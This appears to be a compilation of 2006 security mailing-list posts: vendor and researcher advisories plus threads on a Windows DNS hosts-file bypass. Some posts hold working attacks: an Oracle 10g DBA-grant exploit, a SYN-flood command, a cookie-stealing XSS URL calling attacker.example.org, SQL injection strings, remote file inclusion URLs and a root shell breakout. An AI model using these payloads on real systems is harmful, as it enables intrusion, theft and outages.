accessible under http://beta.mini.tlen.pl
and used inside Tlen.pl IM client.
On the account tested (login: koper, served by beta.mini.tlen.pl, 193.17.41.32,
registered over 5 years ago), the lenght of
subject displayed is 28 characters, which is the lenght an attacker can use to
inject HTML.
::3::Impact::
An attacker could include some of this code inside the subject field of e-mail
sent to the target account:
http://pass.pl";
//(28 chars, no HTML ending bracket, still http://pass.pl page is displayed
inside ,
//giving an attacker the ability to include more code. Having shorter domain
name allows an
//attacker to give valid tag.
alert("xx")
//Displays 2 chars alert window
etc.
::4::Solution::
None provided, Vendor contacted on 16 Feb 2006.
::6::Systems affected::
All Tlen.pl Communicator versions, but not all accounts affected.
Servers checked to be vulnerable: beta.mini.tlen.pl [ 193.17.41.32 ].
Servers checked NOT to be vulnerable: mini10.tlen.pl [ 193.17.41.92 ].
Re: Multiple Vulnerabilities in LucidCMS
these vulnerabilites are dealt with for the next release candidate (RC6)
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup
Obnoxious, sure, but not hard to beat. (Assuming for some insane reason you are actually still using Windows for anything other than playing games) You just add an entry in your DNS server with a zone matching the hostname that you want to override. And if they have the IP addresses of MSFT-controlled DNS servers hardcoded, you just add an iptables (or equivalent) entry in your firewall (note - this is a seperate device than your wintendo PC, not a peice of software running on your PC)
Fortinet28 box does not resist has small synflood!
Fortinet28 box does not resist has small synflood on smtp port! ips protection is not effective because there is not enough syn! hping -i u10 -p 25 -S mail.fortinet.com Concerned about your privacy? Instantly send FREE secure email, no account required http://www.hushmail.com/send?l=480 Get the best prices on SSL certificates from Hushmail https://www.hushssl.com?l=485
ContentBoxx Login.php Cross-Site Scripting
Website : http://www.contentboxx.info/en/ Author : Botan Description: Web Content Management ContentBoxX is a professional software upon which the production of editorial systems, used in the maintenance of Internet and Intranet offers, are based. ContentBoxX is suited for use in demanding Web sites. And, because of its open architecture, is up to even the most complex challenges. Vulnerable : http://www.site.com/cms/login.php?action=XSS
WWWThread RC 3 MultBugs
[code]// --- WWWThread RC 3 MultBugs --- //
* D3vil-0x1 | Devil-00
* www.securitygurus.net
* Gr33tz
- HACKERS PAL | n0m3rcy | -
&
All Others << i forgot them :))
//-//
//-// [ Bug 1 ]
//-//
// File name :- register.php
// Bug :- Remote [ _COKKIE['forumreferrer] ] SQL Injection
/* Code
//
if(isset($_COOKIE["forumreferrer"]))
{
$referral_id = $_COOKIE["forumreferrer"];
$result = $db->query('SELECT referral_count FROM
'.$db->prefix.'users WHERE id='.$referral_id)or
error(mysql_error(), __FILE__, __LINE__, $db->error());
list($referral_val) = $db->fetch_row($result);
$rval = $referral_val[0] + 1;
$db->query('UPDATE '.$db->prefix.'users SET referral_count='.
$rval . ' WHERE id='.$ referral_id) or
error(mysql_error(), __FILE__, __LINE__, $db->error());
}
//
*/
Fix :-
/*
$referral_id = intval($_COOKIE["forumreferrer"]);
*/
//-// //-//
//-// //-//
//-// //-//
//-// //-//
//-// [ Bug 2 ]
//-//
// File name :- message_list.php
// Bug :- Remote SQL Injection
/* Code
if( isset($_POST['delete_messages']) || isset($_POST['delete_messages_comply'])
)
{
if( isset($_POST['delete_messages_comply']) )
{
confirm_referrer('message_list.php');
$db->query('DELETE FROM '.$db->prefix.'messages WHERE id
IN('.$_POST['messages'].') AND owner=
\''.$forum_user['id'].'\'') or error(mysql_error(), __FILE__, __LINE__,
$db->error());
redirect('message_list.php?box='.$_POST['box'],
$lang_pms['Deleted redirect']);
}
*/
// Fix :-
Replace with this code :D
if( isset($_POST['delete_messages']) || isset($_POST['delete_messages_comply'])
)
{
if( isset($_POST['delete_messages_comply']) )
{
confirm_referrer('message_list.php');
$db->query('DELETE FROM '.$db->prefix.'messages WHERE id
IN('.intval($_POST['messages']).') AND owner=
\''.$forum_user['id'].'\'') or error(mysql_error(), __FILE__, __LINE__,
$db->error());
redirect('message_list.php?box='.$_POST['box'],
$lang_pms['Deleted redirect']);
}
// Exploit
- Resend This Requsit By HTTPLiveHeaders :D -
messages=[SQL]&box=0&delete_messages_comply=Delete
[/code]
Re: RE: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup
The XP DNS client has other problems as well. It caches DNS failiures (arguably out of spec with the RFC, BTW), screwing up VPNs if you're VPNed into an internet network that has local domains which need to resolve to RFC1918 addresses. The cached failed lookups get prefered to forced entries in the hosts file, if that is tried as a way of forcing the dns lookups to work. Very frustrating. So, this isn't much of a surprise. Rotten, yes, surprising, no.
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup
After reading your scary message, went to verify your points and confirmed all. Whilst, as I've been running a real software firewall (Sunbelt Kerio Personal Firewall is for free) on top of a router firewall, I've been able to block or force a request as I see fit for each of these sites. On WMP, untick the Automatic Coded update function for starters, but indeed its highly irritating that you have no control over auto update yes/no. As to the MS firewall, that's a joke. It only does partial incoming traffic control and NONE on outgoing! If you like blocking specific IP's or ranges use for instance Peerguardian 2. I find it stops truly anything you don't want to not to come thru. The bypassing of the HOSTS file is something i thinks would fall under required disclosurechanging functionality of an intergral part to network control. Think this build in trickery will have interest of the EU commission too!
Shbablek Mail Vulnerablitiy - Cross-Site Scripting
# Shbablek Mail Vulnerablitiy - Cross-Site Scripting # by n0m3rcy # Copyright (c) 2006 n0m3rcy <[EMAIL PROTECTED]> # Exploit: i) in the Already have an account? ia) Account name: alert(1) ib) Password: alert(1) # Shoutz: cijfer , dag , devil-00 , q-ex and all my friends # have phun!
redirection vuln crawlers breed & security through obscurity
I just came across such kind of code (php) written by a colegue:
//header.inc
if($_SESSION['UN']!='hardcoded_UN' or $_SESSION['UN']!='hardcoded_PW')
header("Location: ./login.html");
//missing else to mitigate the problem!!
//HTML stuff here...
code structure of all the other "supposed to be" private pages is:
//wannabeprotected.php
include_once("include/header.inc")
//wannabe protected code
Everything resides at something like:
http://site/admin/
of course the ONLY thing you've to do to break into the admin interface is:
- disable redirection in your preferred browser (w3m)
- guess the right address and
- point exactly to it: http://site/admin/index.php or any existing page[1] eg.
http://site/admin/killingmesoftly.php
http://site/admin/ won't work. I did some research to see if you could find a
way to make "educated guess" by examining the flow of HTTP responses, but I
didn't came out with any good idea. Nevertheless index.php doesn't seem to be a
bad educated guess (as Default.asp, index.asp, index.pl, login.asp...).
Now some questions and a proposal:
- how safe is to rely on secrecy of the URL? I'm looking for a quantification
of the risk, not a "it is a bad idea" ;)
of course http://site/`pwgen -N1 30`/`pwgen -N1 30`.php is safer than
http://site/admin/index.php. Any already made study? numbers?
- are SE like google going to index such kind of pages if there is no
"external" link[*]?
- are there already many specialized vuln crawlers looking for such kind of
URLs?
What about building crawlers that ignore redirection to scan for such kind of
vulns?
I think that kind of mistake should be pretty popular.
Did I reinvent the wheel?
[1] this makes educated guessing easier increasing the number of potential
targets: manager.php, insert.php, delete.php and it makes this [in]security
model rely just on the dir path... unless the programmer is so crazy to call
all his files with random names. But coding the access credential in a path
makes the code not that relocable... etc... etc..
[*] What I mean: it exists a chain of links that connect that page with a link
on a homepage or an already indexed page.
BTW the colegue didn't set any association between .inc and the php
interpreter. So you can even get the header.inc source with another maybe
harder educated guess.
... and happy Easter holidays.
--
Ivan Sergio Borgonovo
http://www.webthatworks.it
Re: [Full-disclosure] Microsoft DNS resolver: deliberately sabotagedhosts-file lookup
On Sat, 15 Apr 2006, Thor (Hammer of God) wrote: It's a simple method to bypass malicious host file modification. Probably in response to malware like MyDoom, which specifically altered the hosts file to keep clients from accessing AV sites ( go.microsoft.com was also specifically included in MyDoom as well.) Sure. And instead of everyone whining about this, they should prepare their DNSSEC setup so microsoft can secure their zone and can rely on the resolver to use DNSSEC to prevent these types of malware traps. Paul
Re: phpBB Admin command execution
On which version of phpBB was this tested?
Cisco Security Advisory: Multiple Vulnerabilities in the WLSE Appliance
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Cisco Security Advisory: Multiple Vulnerabilities in the WLSE
Appliance
Advisory ID: cisco-sa-20060419-wlse
http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
Revision 1.0
For Public Release 2006 April 19 1500 UTC (GMT)
- -
Contents
Summary
Affected Products
Details
Impact
Software Version and Fixes
Workarounds
Obtaining Fixed Software
Exploitation and Public Announcements
Status of this Notice: FINAL
Distribution
Revision History
Cisco Security Procedures
- -
Summary
===
There are two vulnerabilities that exist in the CiscoWorks Wireless
LAN Solution Engine (WLSE). The first is a cross site scripting (XSS)
vulnerability that may allow an attacker to gain administrative
privileges on the system. The second is a local privilege escalation
vulnerability that can be used by an attacker who already has
authenticated access to the command line interface to obtain access
to the underlying operating system.
Cisco has made free software available to address this vulnerability
for affected customers.
This advisory is available at
http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
Affected Products
=
Vulnerable Products
+--
A CiscoWorks Wireless LAN Solution Engine (WLSE) or WLSE Express
running any version of software prior to 2.13 are vulnerable to both
of these vulnerabilities.
Several other Cisco products are affected only by the local privilege
escalation vulnerability, including Cisco Hosting Solution Engine
(HSE), User Registration Tool (URT), Cisco Ethernet Subscriber
Solution Engine (ESSE) and CiscoWorks2000 Service Management
Solution. A separate Cisco Security Response has been published
regarding the impact and the fixes on these products and can be found
at http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml
Products Confirmed Not Vulnerable
+
No other Cisco products are affected by both of these
vulnerabilities.
Details
===
CiscoWorks WLSE is a centralized, systems-level application for
managing and controlling an entire autonomous Cisco WLAN
infrastructure.
Two vulnerabilities exist in the WLSE appliance that may allow an
attacker to gain complete control of the device or to obtain access
to the underlying operating system.
These issues are documented by the following Cisco bug IDs:
* CSCsc01095 (registered customers only) - Cross site scripting
vulnerability in WLSE appliance web interface
This fix addresses the cross site scripting (XSS) vulnerability
in the WLSE appliance web user interface. By exploiting this
vulnerability, an attacker may obtain the session cookie
information and further use this information to gain
administrative privileges on the system.
* CSCsd21502 (registered customers only) - Privilege escalation to
Linux shell
This fix addresses the local privilege escalation from the
command line interface of the WLSE appliance. By exploiting this
vulnerability an attacker who already has authenticated access to
the command line interface may inject a command to obtain a shell
account on the underlying operating system.
Impact
==
By exploiting these vulnerabilities together, an attacker may obtain
complete control of the WLSE appliance.
Software Version and Fixes
==
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center ("TAC") or your contracted
maintenance provider for assistance.
These vulnerabilities are fixed in the 2.13 version of WLSE software.
Fixed software can be downloaded from the following URL:
http://www.cisco.com/cgi-bin/tablebuild.pl/wlan-sol-eng
Workarounds
===
There are no workarounds for these vulnerabilities.
Obtaining Fixed Software
Cisco will make free software available to address this vulnerability
for affected customers. This advisory will be updated as fixed
software becomes available. Prior to deploying software, customers
should consult their maintenance provider or check the software for
feature set compatibility and known issues specific to their
environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree t
ThWboard <= 3 Beta 2.84 SQL Injection
Discovered by: Qex Date: 19 April 2006 /showtopic.php?threadid=1&pagenum=[SQL]
RechnungsZentrale V2 - SQL injection and Remote PHP inclusion vulnerabilities
-- - GroundZero Security Research and Software Development 2006 - -- - - - Security Advisory regarding RechnungsZentrale v2. - - SQL Injection and Remote File inclusion Vulnerabilities. - - Released: Tue Apr 18 18:00:00 CEST 2006 - - - -- -- - Affected: - -- Software: RechnungsZentrale V2 Version:1.1.3, likely older versions are affected aswell. Vendor: http://www.nfec.de/ -- - Information: - -- "RechnungsZentrale V2 is a multiuser, Web-based billing application. It facilitates the creation of bills and the management of customers. It is written in PHP and uses MySQL. It supports German, English, French, and Dansk languages." The Software contains vulnerabilities which allow an Attacker to conduct SQL injection and Remote File inclusion Attacks prior to Authentication. The SQL injection vulnerabilitie exists in the login script (authent.php4) and allows an Attacker to log into the internal Interface or execute malicious SQL commands. PoC: User: ' OR '1'='1 Password: 1 In the same script it is possible to include a remote php by pointing the "rootpath=" option to a remote PHP script with a system() or passthru() function. Doing so would allow an unauthenticated Attacker to execute shell commands with permissions of the Web Server. PoC: http://www.victim.tld/mod/authent.php4?rootpath=Http://server.tld/mod/db.php4 -- - Vendor Response: - -- Notified: Tue Apr 18 16:12:14 CEST 2006 Response: Tue Apr 18 17:13:14 CEST 2006 (Development Discontinued) Disclosure: Tue Apr 18 18:00:00 CEST 2006 -- - Bugs discovered by GroundZero Security Research and Software Development - - http://www.GroundZero-Security.com | Http://www.g-0.org - --
Multiple vulnerabilities in Linux based Cisco products
Assurance.com.au - Vulnerability Advisory --- Release Date: 19-Apr-2006 Software: Cisco Wireless Lan Solution Engine (WLSE) Cisco Hosting Solution Engine (HSE) Cisco Ethernet Subscriber Solution Engine (ESSE) Cisco User Registration Tool (URT) CiscoWorks2000 Service Management Solution (SMS) Cisco Vlan Policy Server (VPS) Cisco Management Engine (ME1100 Series) CiscoWorks Service Level Manager (SLM) Vulnerabilities discovered: (1) A Vulnerability in the CiscoWorks WLSE "show" CLI application allows execution of arbitrary code as the root user. (2) Cross-site scripting flaw allows session theft Vulnerability impact of each: (1) Medium - An authenticated user can gain root access to the Linux based system (2) Low - A targeted attack could lead to session theft and administrator compromise Vulnerability information (1) The Cisco shell presents the administrator with a restricted set of commands which includes a "show" application. The "show" application has several vulnerabilities which allow an attacker to "break out" of the shell and execute commands (including /bin/sh) as the root user. This "show" application has been in use on this Linux-based platform build since 1999 and exists on several other Linux-based Cisco products. Example: An Administrator is logged into the Cisco WLSE via either Telnet or SSH. [EMAIL PROTECTED]: show version (C) Copyright 2005 by Cisco Systems Inc. WLSE 1130 Release 2.11FCS Thu Apr 14 00:09:56 UTC 2005 Device Limit = 2550 Build Version (67) Tue Mar 15 18:13:02 UTC 2005 Uptime: 2 days 3 hours 32 mins Linux version 2.4.28-5_WLSEsmp ([EMAIL PROTECTED]) (gcc version 2.96 2731 (Red Hat Linux 7.3 2.96-113)) #1 SMP Mon Jan 31 16:04:20 PST 2005 1130 Intel(R) CPU at 3065.897 Mhz with 3105924K bytes of memory. [EMAIL PROTECTED]: show syslog include ";/bin/sh -i;" sh-2.05a# id uid=0(root) gid=502(admin) groups=502(admin),500(enable) At this point the administrator has root level access to the Linux-based Cisco device. (2) A cross-site scripting flaw exists in: /wlse/configure/archive/archiveApplyDisplay.jsp with the "displayMsg" parameter. This can be used to steal the JSP session cookie, therefore giving a targeted attacker admin level access to the system. Once the attacker has admin web GUI access to the system via the XSS, they can then change the admin password or create a new admin user (without requiring the admin password). The attacker can then use the aforementioned "show cli" local root vulnerability to gain complete control of the Cisco Linux-Based system. As with (1) above Telnet or SSH access is required to login with the newly created user with admin level access in order to exploit the "show cli" bug. Example: http://cisco-wlse.example.org/wlse/configure/archive/ \ archiveApplyDisplay.jsp?displayMsg=document.location='http:// \ attacker.example.org?'+document.cookie The cookie posted to attacker.example.org includes the JSESSIONID token: ORIG_URL=cisco-wlse.example.org; browser_tzoffset=-660; \ JSESSIONID=johjehk2h1; \ HSE_TKT=admin:1133234898:17e5187e228ab1546ac26ef4ecacf689 When combined with vulnerability (1), it allows a targeted attacker to gain root access to the linux system. Solution: Cisco has released patches for the vulnerabilities. References: Assurance.com.au advisory http://www.assurance.com.au/advisories/200604-cisco.txt Cisco advisory note: http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml Cisco security response: http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml Credit: Adam Pointon of Assurance.com.au http://www.assurance.com.au/ Disclosure timeline: 30-Dec-2005 - Discovered during configuration for a customer 29-Jan-2006 - Email sent to psirt[at]cisco.com with full technical details 31-Jan-2006 - Response received from Cisco psirt 01-Feb-2006 - Cisco advises bug reports have been opened for both issues 05-Apr-2006 - Cisco releases patches to Assurance.com.au for testing 19-Apr-2006 - Advisory released About us: Assurance.com.au is a specialised information security consultancy. Our mission is to help organisations identify and secure information assets. Our expertise concentrates in security architecture, managed security and professional services in security testing/review and compliance. Supporting this approach are services in the following areas: * Compliance Services - Penetration testing, security reviews, compliance and audit services * Wireless and mobility solutions - design, installation and management of IEEE 802.11a/b/g (WiFi), tele-mobility and other wireless solutions * UNIX-like systems, netw
[security bulletin] HPSBUX02108 SSRT061133 rev.7 - HP-UX running Sendmail, Remote Execution of Arbitrary Code
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c00629555 Version: 7 HPSBUX02108 SSRT061133 rev.7 - HP-UX running Sendmail, Remote Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2006-04-17 Last Updated: 2006-04-18 Potential Security Impact: Remote Execution of Arbitrary Code Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A vulnerability has been identified in Sendmail which may allow a remote attacker to execute arbitrary code. References: CVE-2006-0058 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.00, B.11.11, B.11.23. BACKGROUND CERT has published a vulnerability report available at: http://www.kb.cert.org/vuls/id/834865 This bulletin will be revised as other versions of Sendmail become available. To determine if an HP-UX system has an affected version, search the output of "swlist -a revision -l fileset" for one of the filesets listed below. For affected systems verify that the recommended action has been taken. AFFECTED VERSIONS For sendmail 8.13.3 HP-UX B.11.23 == SMAIL-UPGRADE.INET-SMAIL SMAIL-UPGRADE.INET2-SMAIL action: install revision B.11.23.02.002 or subsequent URL: ftp://sendmail:[EMAIL PROTECTED]/ sendmail-8.13_1123.depot HP-UX B.11.11 == SMAIL-UPGRADE.INETSVCS-SMAIL action: install revision B.11.11.02.002 or subsequent URL: ftp://sendmail:[EMAIL PROTECTED]/ sendmail-8.13_.depot For sendmail 8.11.1 HP-UX B.11.23 == InternetSrvcs.INETSVCS2-RUN action: install UNOF_INET31734_1.depot or subsequent URL: ftp://sendmail:[EMAIL PROTECTED]/ UNOF_INET31734_1.depot ->HP-UX B.11.11 == SMAIL-811.INETSVCS-SMAIL ->action: remove SMAIL-811 and migrate to SMAIL-UPGRADE URL: ftp://sendmail:[EMAIL PROTECTED]/ sendmail-8.13_.depot HP-UX B.11.00 == SMAIL-811.INETSVCS-SMAIL action: install revision B.11.00.01.006 or subsequent URL: ftp://sendmail:[EMAIL PROTECTED]/ sendmail-811_01.006.depot For sendmail 8.9.3 and previous HP-UX B.11.11 == InternetSrvcs.INETSVCS-RUN action: install UNOF_INET_29774_1.depot or subsequent URL: ftp://sendmail:[EMAIL PROTECTED]/ UNOF_INET_29774_1.depot HP-UX B.11.00 == InternetSrvcs.INETSVCS-RUN action: install UNOF_INET29773_1.depot or subsequent URL: ftp://sendmail:[EMAIL PROTECTED]/ UNOF_INET_29773_1.depot END AFFECTED VERSIONS RESOLUTION HP has made the following software updates available to resolve the issue. Installations running sendmail 8.8.6 should upgrade to sendmail 8.9.3 or 8.11.1 from the patch/upgrade software listed in this bulletin. Installations running sendmail 8.11.1 on HPUX 11.11 should upgrade to sendmail 8.13.3 from the upgrade software listed in this bulletin. The software updates can be downloaded via ftp from: System: hprc.external.hp.com (192.170.19.100) Login: sendmail Password: sendmail (NOTE: CASE-sensitive) ftp://sendmail:[EMAIL PROTECTED]/ or ftp://sendmail:[EMAIL PROTECTED]/ The README.txt.pgp there contains cksum and md5 output for the preliminary depots. For sendmail 8.13.3, HP-UX B.11.23 sendmail-8.13_1123.depot cksum 692720776 15759360 md5 E09933A4AECC16B97A8F7ACF07060F84 For sendmail 8.13.3, HP-UX B.11.11 sendmail-8.13_.depot cksum 954959898 5130240 md5 C85EFD8AEDB16EEF1DF0FF65988350C0 For sendmail 8.11.1, HP-UX B.11.23 UNOF_INET31734_1.depot cksum 3327957574 3317760 md5 B17A7F5566214B35E983B3F53C309A17 UNOF_INET31734_1.text cksum 2096860596 7487 md5 565F7963B77BEE3EB2825990F60D1F6D ->For sendmail 8.11.1, HP-UX B.11.11 ->sendmail-811_08.depot ->cksum 3968008060 2938880 ->md5 91a050b976b522a27558e92673fca591 For sendmail 8.11.1, HP-UX B.11.00 sendmail-811_01.006.depot cksum 4072259977 2846720 md5 847aa9f1a154da9b07afc26d91fbaba6 sendmail-811_01.006.text cksum 2379624538 36262 md5 cac0d95747af260f40dac7cc943f6353 For sendmail 8.9.3 and previous, HP-UX B.11.11 UNOF_INET_29774_1.depot cksum 3708819014 890880 md5 8580A701FC19A49703C852440DBD25FA For sendmail 8.9.3 and previous, HP-UX B.11.00 UNOF_INET29773_1.depot cksum 2797348841 1372160 md5 2b33f65a2c81894849a5a6eb7d67650f UNOF_INET29773_1.text cksum 2797348841 1372160 md5 67acbcff161b71930365b3b77788fbde After installation, verify output of what /usr/sbin/sendmail. To check if installations are running sendmail 8.8.6 execute "what /usr/sbin/sendmail" and check the version string. ->Upgrading sendmail 8.8.6 / 8.9.3 to 8.11.1 or 8.13.3 is done ->using the depots mentioned in this bulletin. ->Sendmail-811 for HP-UX B.11.11 ->In lieu of installing the upgrade SMAIL-811 consider upgrading ->to sendmail 8.13.3 available in SMAIL-UPGRADE. ->If servers are running sendmail 8.11.1 and can not be upgdraded ->to 8.13.3 a solution is available by contacting your support ->representative. MANUAL ACTIONS: Yes - NonUpdate HP-UX B.11.00 - install preliminary software update
Re: [KAPDA::#41] - Mambo/Joomla rss component vulnerability
This issue was addressed in the Joomla! 1.0.8 release: http://forum.joomla.org/index.php/topic,55808.msg298644.html#msg298644 http://www.joomla.org/content/view/940/74/ Rey Gigataras - Joomla! Core Developer Stability Team Leader www.joomla.org
Re: Path Disclosure and Arbitrary File Read Vulnerability in SLAB5000
These issues were brought to my attention, and I have patched the page= issue. I welcome any other friendly prodding of my system. Please notify me if you find more vulnerabilities.
Cisco Security Advisory: Cisco IOS XR MPLS Vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco IOS XR MPLS Vulnerabilities Advisory ID: cisco-sa-20060419-xr http://www.cisco.com/warp/public/707/cisco-sa-20060419-xr.shtml Revision 1.0 For Public Release 2006 April 19 1500 UTC (GMT) - - Contents Summary Affected Products Details Impact Software Version and Fixes Workarounds Obtaining Fixed Software Exploitation and Public Announcements Status of this Notice: FINAL Distribution Revision History Cisco Security Procedures - - Summary === Multiple Multi Protocol Label Switching (MPLS) related vulnerabilities exist on Cisco IOS XR. Only systems that are running Cisco IOS XR and configured for MPLS are affected by these vulnerabilities. Upon successful exploitation a Modular Services Card (MSC) on a Cisco Carrier Routing System 1 (CRS-1) or a Line Card (LC) on a Cisco 12000 series router may reload affecting switched traffic. Cisco has made free software available to address this vulnerability for affected customers. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060419-xr.shtml. Affected Products = Vulnerable Products +-- Only systems that are running Cisco IOS XR and configured for MPLS are affected by this vulnerability. Systems that are running Cisco IOS XR and configured for MPLS can be identified by the show mpls interfaces command. A sample output of this command on a CRS-1 that is configured for MPLS is given below. RP/0/RP1/CPU0:crs1#show mpls interfaces Interface LDP Tunnel Enabled -- POS0/2/0/0 Yes Yes Yes POS0/2/0/1 No Yes Yes POS0/2/0/2 Yes No Yes POS0/2/0/3 Yes Yes Yes GigabitEthernet0/3/1/0 Yes No Yes GigabitEthernet0/3/1/3 Yes No Yes POS0/3/0/1 Yes Yes Yes TenGigE0/6/0/0 Yes No Yes RP/0/RP1/CPU0:crs# In the above output, the fourth column labeled Enabled identifies MPLS enabled interfaces. Products Confirmed Not Vulnerable + Cisco IOS XR only runs on CRS-1 or Cisco 12000 series routers. Other Cisco products, including systems that run Cisco IOS are not affected. Details === Cisco IOS XR Software is a member of the Cisco IOS Software Family that uses a microkernel based distributed operating system infrastructure. Cisco IOS XR runs both on Cisco CRS-1 and Cisco 12000 series routers. More information on Cisco IOS XR can be found at the following URL: http://www.cisco.com/en/US/products/ps5845/index.html Modular Services Cards (MSC), also called the line cards are Layer-3 forwarding engines on Cisco CRS-1. An MSC is paired with a physical layer interface module (PLIM) which provides layer-1 and layer-2 services. More information on Cisco CRS-1 architecture can be found at the following URL: http://www.cisco.com/en/US/products/ps5763/index.html Specific MPLS packets that are switched by a Cisco CRS-1 or a 12000 series system will restart the NetIO process. If the NetIO process is restarted several times consecutively, the line card will reload causing a Denial of Service (DoS) condition for the traffic that is being switched on that line card. MPLS packets will be forwarded through the MPLS network. Therefore, packets that can trigger this vulnerability can be sent from remote systems that are in the MPLS network. Such packets can not be received on interfaces that are not configured for MPLS. This vulnerability is addressed by the following Cisco bug IDs: * CSCsd15970 -- MSC crash upon receipt of specific MPLS packets This bug only affects CRS-1 and does not affect Cisco 12000 series routers that are running Cisco IOS XR. * CSCsd55531 -- MPLS packet handling problems This bug only affects CRS-1 and does not affect Cisco 12000 series routers that are running Cisco IOS XR. * CSCsc77475 -- Line card crash upon receipt of specific MPLS packets This bug affects both CRS-1 and Cisco 12000 series routers that are running Cisco IOS XR. Impact == Successful exploitation of the vulnerability may result in a reload of the Modular Services Card (MSC) on a CRS-1 or the line cards on a Cisco 12000 series router. Repeated exploitation could result in a sustained DoS attack. Software Version and Fixes == When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to
XSS Vulnerability in Guest-book script powered by Community Architect
[This document is best seen with Font: Verdana Size: 9pt] Advisory Name === XSS Vulnerability in Guest-book script powered by Community Architect Vulnerable Systems == Sites providing web-hosting service powered by Community Architect. Found By === Susam Pal Found On === 4th April, 2006 Vulnerability Type = Cross Site Scripting (XSS) Action Taken = Reported to 20m.com (20m.com is one of the sites powered by Community Architect) Response === 20m.com fixed the vulnerability on 10th April, 2006 System Description == Many web-hosting sites powered by Community Architect offer free as well as paid services to those who want to host a website on their servers. They offer customized Guest-book input form page (http://www.vulnerablesite.com/fsguest.html), Guest-book page (http://www.vulnerablesite.com/fsguestbook.html) along with ready-made script (http://www.vulnerablesite.com/cgi-bin/guest) to the web-designer designing a website on their servers. A person visiting the website signs the guest-book by filling up the form in http://www.vulnerablesite.com/fsguest.html. On submission, the inputs are submitted to the script, http://www.vulnerablesite.com/cgi-bin/guest on the server. The script processes the input and updates the page, http://www.vulnerablesite.com/fsguestbook.html to reflect the new message submitted by the user. Vulnerability Description = The script, http://www.vulnerablesite.com/cgi-bin/guest, is vulnerable to XSS since it doesn't validate the input for the presence of HTML tags. As a result HTML tags & JavaScript codes entered as input in the form of http://www.vulnerablesite.com/fsguest.html become a part of the HTML code of http://www.vulnerablesite.com/fsguestbook.html and hence it is executed by the browser when any user visits the page. It provides the attacker an opportunity to inject HTML formatting elements to tamper with the display of the page or inject JavaScript code to trouble the user visiting this page. Contact Information == For more information, please contact:- Susam Pal, Infosys Technologies Ltd. Survey No. 210, Manikonda Village Lingampally, Rangareddy District Hyderabad, PIN 500019 India Phone No.: +91-99859521 Email: [EMAIL PROTECTED]
Oracle 10g 10.2.0.2.0 DBA exploit
/* * Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0 * * Patch your database now! * * by N1V1Hd $3c41r3 * */ CREATE OR REPLACE PACKAGE MYBADPACKAGE AUTHID CURRENT_USER IS FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER; END; / CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE IS FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3 VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER IS pragma autonomous_transaction; BEGIN EXECUTE IMMEDIATE 'GRANT DBA TO HACKER'; COMMIT; RETURN(1); END; END; / DECLARE INDEX_NAME VARCHAR2(200); INDEX_SCHEMA VARCHAR2(200); TYPE_NAME VARCHAR2(200); TYPE_SCHEMA VARCHAR2(200); VERSION VARCHAR2(200); NEWBLOCK PLS_INTEGER; GMFLAGS NUMBER; v_Return VARCHAR2(200); BEGIN INDEX_NAME := 'A1'; INDEX_SCHEMA := 'HACKER'; TYPE_NAME := 'MYBADPACKAGE'; TYPE_SCHEMA := 'HACKER'; VERSION := '10.2.0.2.0'; GMFLAGS := 1; v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA( INDEX_NAME => INDEX_NAME,INDEX_SCHEMA => INDEX_SCHEMA,TYPE_NAME => TYPE_NAME, TYPE_SCHEMA => TYPE_SCHEMA,VERSION => VERSION,NEWBLOCK => NEWBLOCK,GMFLAGS => GMFLAGS ); END; / _ Acepta el reto MSN Premium: Correos más divertidos con fotos y textos increíbles en MSN Premium. Descárgalo y pruébalo 2 meses gratis. http://join.msn.com?XAPID=1697&DI=1055&HL=Footer_mailsenviados_correosmasdivertidos
[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability
[MajorSecurity]ActualAnalyzer - Remote File Include Vulnerability --- Software: ActualAnalyzer Type: Remote File Include Vulnerability Date: April, 19th 2006 Vendor: ActualScripts Page: http://actualscripts.com Risc: High Credits: Discovered by: 'Aesthetico' http://www.majorsecurity.de Affected Products: ActualAnalyzer Lite 2.72 and prior ActualAnalyzer Gold 7.63 and prior ActualAnalyzer Server 8.23 and prior Description: ActualAnalyzer is a powerful statistics-gathering and analysis tool for monitoring web site traffic. It is equally effective for sites with low and high volumes of traffic and provides a wealth of comparative and analytical information. High performance is achieved by using a MySQL database. Requirements: register_globals = On Vulnerability: Input passed to the "rf" parameter in "direct.php" is not properly verified, before it is used to include files. This can be exploited to include arbitrary files from external resources. Solution: Edit the source code to ensure that input is properly sanitised. Set "register_globals" to "Off". Exploitation: Post data: rf=http://www.yourspace.com/yourscript.php?
